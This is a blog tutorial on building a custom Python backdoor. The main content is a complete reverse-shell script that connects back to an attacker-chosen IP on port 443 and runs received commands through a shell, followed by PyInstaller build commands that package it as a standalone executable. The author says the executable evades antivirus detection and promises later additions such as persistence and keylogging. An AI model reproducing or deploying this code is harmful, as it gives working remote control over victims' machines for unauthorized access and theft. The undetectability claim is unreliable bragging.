Programming a Custom Backdoor in Python

Howdy!

Introduction

Today we are going to program a simple custom backdoor — a few lines of code — that totally avoids detection by every a/v out there. We’re gonna be writing this code in the Python programming language. If you don’t have the environment set up, never worry. I have another brief video/post showing you the requirements, click here to check it out.

The idea is to give you guys the power of creating your own backdoors instead of blatantly depending on crypters, third-party code (which isn’t always safe to use) and so on. In all honesty, I’m just as new to Python as most of you readers probably are — although if you check my about page, I do program in other languages — nevertheless I have faith that with a little effort we will be able to not only create a stealthier backdoor, but also add new features as well such as persistence, keylogging and maybe even a multi-threaded listener to control more than one client at a time.

Right now, this is mainly speculation and of course, the main aspect of this is not to have a shell to do bad things with it, but to learn how these protocols work in and out of Python — so yes, if you are interested in custom backdoors for another language, just drop a line. 🙂

Hopefully this tutorial will also become a series, so long as you guys — the readers — collaborate ideas to implement and help out as well to make a stealthier custom backdoor.

Credits on the code go out to Dave Kennedy and his work on building several Python shells.

Custom Shell

Here is the code used for the custom shell, just make sure to substitute anywhere with an underline for your own values, such as IP, port, etc.

#!/usr/bin/python
import subprocess,socket
HOST = 'Your IP Adress'
PORT = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send('Hello There!')
while 1:
data = s.recv(1024)
if data == "quit": break
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdoutput = proc.stdout.read() + proc.stderr.read()
s.send(stdoutput)
# loop ends here
s.send('Bye now!')
s.close()

You can click here and download my copy of the backdoor and netcat. [ DOWNLOAD ]

I have seen this code in a few places, such as Dave K’s blog and the book “Foundations of Python Network Programming” both listed at the end of this post in the further readings section…

Compiling Executable

As mentioned in my previous post we will be using PyInstaller to create the stand-alone executable. It comes out pretty heavy for a shell (a few megs) but hey, works mint and completely undetectable.

Here is the code used for compiling the code, again, just replace the underlined part. Oh yea, make sure you are inside the PyInstaller directory as well… and that you have your code copied to that location.

python Configure.py
python Makespec.py --onefile shell.py
python Build.py shell\shell.spec

That’s about it, your executable should be ready to go — inside the /dist folder.

Presentation

Check out the video for commentary explaining the code line by line…

[ UPDATE ] — Check out the next part in the series, “Python Backdoor – AES Encrypted Traffic”

Further Reading

I am almost finished reading the book “Foundations of Python Network Programming” and I have to say, it’s very thorough; explains networking from the bottom all the way to the top. So if you don’t know anything about networking, this is the way to go. Not only will you learn your TCP from UDP but also how to code Python as well. If I’m not mistaken, in the beginning of the second chapter they already show you client/server code for a UDP socket — which could easily be implemented into a shell. I definitively recommend this one!

One blog that’s been in my favorites recently is Dave K.’s and not only because of S.E.T. He constantly publishes some awesome posts regarding encrypted shells, exploits and all types of goodness’. Waste no time, click here to check it out!

Again, I randomly stumbled upon the AverageSecurityGuy and immediately favorited it. He also features some interesting code — different types of shells and other nifty scripts! Also a really nice guy willing to help out.

2 thoughts on “Programming a Custom Backdoor in Python”

Leave a Reply

Your email address will not be published. Required fields are marked *